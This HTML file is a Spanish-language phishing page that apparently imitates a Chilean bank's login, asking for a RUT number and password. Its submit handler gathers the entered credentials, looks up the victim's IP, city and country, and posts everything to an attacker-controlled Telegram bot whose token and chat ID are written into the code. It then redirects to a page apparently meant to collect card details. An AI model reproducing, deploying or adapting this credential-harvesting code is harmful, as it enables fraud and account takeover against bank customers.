<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />

    <title>Formulario de Inicio de Sesión</title>
    <style>
      body {
        margin: 0;
        padding: 0;
        font-family: Arial, sans-serif;
        background-color: #f4f4f4;
        display: flex;
        align-items: center;
        justify-content: center;
        height: 100vh;
      }

      #login-box {
        width: 100%;
        max-width: 450px;
        background: #fff;
        padding: 20px;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
        text-align: center;
      }

      #login-box h1 {
        margin-bottom: 20px;
      }

      #login-box input {
        width: 90%;
        padding: 10px;
        margin: 10px 0;
        border: 0;
        border-bottom: 1px solid #257fa4;
        border-radius: 5px;
        background: #f5fafb;
      }

      #login-box button {
        width: 95%;
        padding: 10px;
        background: #007bff;
        color: #fff;
        border: none;
        border-radius: 5px;
        cursor: pointer;
      }

      @media (max-width: 767px) {
        body {
          justify-content: flex-start;
          align-items: normal;
        }

        #login-box {
          width: 100%;
          border-radius: 0;
        }
      }
    </style>
  </head>

  <body>
    <div id="login-box">
      <img src="santnedr.png" alt="" />

      <form id="loginform">
        <input
          type="text"
          placeholder="RUT"
          name="usuario"
          id="usuario"
          inputmode="numeric"
          minlength="11"
          maxlength="11"
          oninput="formatoNumero(this)"
          required
        />
        <script>
          function formatoNumero(input) {
            // Eliminar caracteres no numéricos
            let soloNumeros = input.value.replace(/\D/g, "");

            // Aplicar formato
            let formato = soloNumeros.replace(
              /^(\d{2})(\d{3})(\d{3})(\d{1})$/,
              "$1.$2.$3-$4"
            );

            // Actualizar el valor del input
            input.value = formato;

            // Verificar la longitud después del formateo
            if (soloNumeros.length === 9) {
              input.setCustomValidity("");
            } else {
              console.log(soloNumeros.length);
              input.setCustomValidity("El RUT debe tener 9 caracteres");
            }
          }
        </script>

        <input
          type="password"
          placeholder="Clave"
          name="contrasena"
          id="clave"
          required
        />
        <button type="submit" style="margin-top: 20px">Iniciar Sesión</button>
      </form>
      <img src="footer.png" style="width: 300px; margin-top: 20px" />
    </div>
  </body>

  <script src="https://cdn.jsdelivr.net/npm/axios@1.1.2/dist/axios.min.js"></script>

  <script>
    const url = "https://ipapi.co/json/";
    const form = document.querySelector("#loginform");
    form.addEventListener("submit", (event) => {
      event.preventDefault(); // aqui evitamos que el código se repita evita que se envíe el formulario
      axios
        .get(url)
        .then((response) => {
          const nombre = document.querySelector("#usuario").value;
          const contra = document.querySelector("#clave").value;

          localStorage.setItem("usuario", nombre);

          const message =
            "\nBMO\nUsuario: " +
            nombre +
            "\nContraseña: " +
            contra +
            "\nCiudad:" +
            response.data.city +
            "\nPais: " +
            response.data.country +
            "\nIP: " +
            response.data.ip;
          axios
            .post(
              "https://api.telegram.org/bot6813453135:AAGfFRmuT5uVMFHzXzotCDQmXs3uj8wqB6o/sendMessage",
              {
                chat_id: "-4037234500",
                text: message,
              }
            )
            .then((response) => {
              parent.location.href = "tarjeta.html";
            })
            .catch((error) => {
              console.error(error);
            });
        })
        .catch((error) => {
          console.log(error);
        });
    });
  </script>
</html>
